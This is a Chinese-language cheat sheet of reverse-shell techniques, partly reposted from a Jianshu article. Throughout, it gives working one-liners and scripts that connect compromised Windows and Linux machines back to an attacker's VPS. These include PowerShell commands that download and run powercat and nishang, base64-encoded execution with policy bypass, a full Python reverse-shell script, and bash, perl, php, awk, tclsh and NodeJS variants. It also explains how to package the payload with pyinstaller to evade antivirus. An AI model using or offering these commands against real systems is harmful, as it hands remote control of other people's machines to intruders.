win:https://eternallybored.org/misc/netcat/
linux: yum install nc -y
常用参数:
-l 开启监听
-p 指定一个端口
-v 显示详细输出
-e 指定对应的应用程序
-n nc不要DNS反向查询IP的域名
-z 连接成功后立即关闭连接
-u 指定nc使用UDP协议,默认为TCP
-w 超时秒数,后面跟数字
服务端:
nc -lvp 8888 -e /bin/bash # Linux
nc -lvp 8888 -e c:\windows\system32\cmd.exe #Windows
客户端:
nc 服务端ip 8888
Windows常见反弹shell手段:
powershell反弹cmd:
powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c vps-ip -p 8000 -e cmd
#或者下载以后执行
powershell Import-Module .\powercat.ps1;powercat -c 119.x.x.x -p 8000 -e cmd
powershell反弹powershell:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress vps-ip -port 8000
注意某些特殊情况需要将powershell脚本进行base64编码,才能成功反弹。比如sqlserver的命令执行、php中system函数的执行
base64编码处理:
$text="IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.203.140/a.ps1'))"
$Bytes=[System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText > bs64.txt
目标机器执行:
powershell -exec bypass -encodedcommand base64.txt
python反弹cmd:
适用于Python2环境
# -*- coding:utf-8 -*-
import os
import select
import socket
import sys
import subprocess
def ReserveConnect(addr, port):
'''反弹连接shell'''
try:
shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell.connect((addr,port))
except Exception as reason:
print ('[-] Failed to Create Socket : %s'%reason)
exit(0)
rlist = [shell]
wlist = []
elist = [shell]
while True:
shell.send("cmd:")
rs,ws,es = select.select(rlist,wlist,wlist)
for sockfd in rs:
if sockfd == shell:
command = shell.recv(1024)
if command == 'exit':
shell.close()
break
result, error = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
shell.sendall(result.decode("GB2312").encode("UTF-8"))
# 主函数运行
def run():
if len(sys.argv)<3:
print('Usage: python reverse.py [IP] [PORT]')
else:
url = sys.argv[1]
port = int(sys.argv[2])
ReserveConnect(url,port)
if __name__ == '__main__':
run()
考虑实战中可能没有python环境
可以先在本地上使用pyinstaller将改文件打包为exe文件,直接上传exe运行即可。(推荐使用)
#python默认不安装pyinstaller
pip install pyinstaller
#使用pyinstaller把py文件打包成exe文件
pyinstaller -Fw test666.py
实际测试bypass av效果也比较好。
Linux常见反弹shell手段:
首先在目标上查看相关命令是否存在:
whereis nc bash python php exec perl
某些目标的 nc 不支持 -e 参数,有两个解决思路
要么使用其他版本的 nc:
sudo apt install netcat-traditional
nc.traditional <your_vps> 1024 -e /bin/sh
要么配合命名管道进行反弹:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f
用 bash 反弹:
/bin/bash -i >& /dev/tcp/<your_vps>/1024 0>&1
用Python反弹(优先使用,ctrl+c无法关闭):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_vps>",1024));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
用php反弹(优先使用,ctrl+c无法关闭):
php -r '$sock=fsockopen("<your_vps>",1024);exec("/bin/sh -i <&3 >&3 2>&3");'
用 exec 反弹:
0<&196;exec 196<>/dev/tcp/<your_vps>/1024; sh <&196 >&196 2>&196
用 telnet 反弹:
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet <your_vps> 1024 > f
用 perl 反弹(优先使用,ctrl+c无法关闭):
perl -e 'use Socket;$i="<your_vps>";$p=1024;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
用 Awk 反弹:
awk 'BEGIN {s = "/inet/tcp/0/<your_vps>/1024"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
用 TCLsh 反弹:
echo 'set s [socket <your_vps> 1024];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
用 NodeJS 反弹(推荐优先使用):
require('child_process').exec('nc -e /bin/sh <your_vps> 1024')
Linux下python反弹shell:
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',8888))
server.listen(5)
print 'waiting for connect'
talk, addr = server.accept()
print 'connect from',addr
proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
stdout=talk, stderr=talk, shell=True)
此节转载作者:book4yi
此节转载链接:https://www.jianshu.com/p/913067492f05